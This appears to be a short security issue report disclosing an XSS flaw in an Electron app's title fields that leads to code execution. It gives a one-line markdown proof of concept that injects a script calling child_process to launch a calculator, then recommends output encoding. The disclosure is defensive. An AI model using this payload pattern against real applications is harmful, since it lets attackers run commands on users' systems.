[Security] XSS RCE #31
Description
The current implementation allows for XSS in the title fields.
XSS in Electron allows to interact with the system api and execute applications or commands.
Markdown POC:
# sometitle <script type="text/javascript">window.top.require('child_process').execFile('/usr/bin/gnome-calculator',function(){});</script>
Fix:
Encode output before it is represented to the ui.
OWASP XSS Prevention Cheat Sheet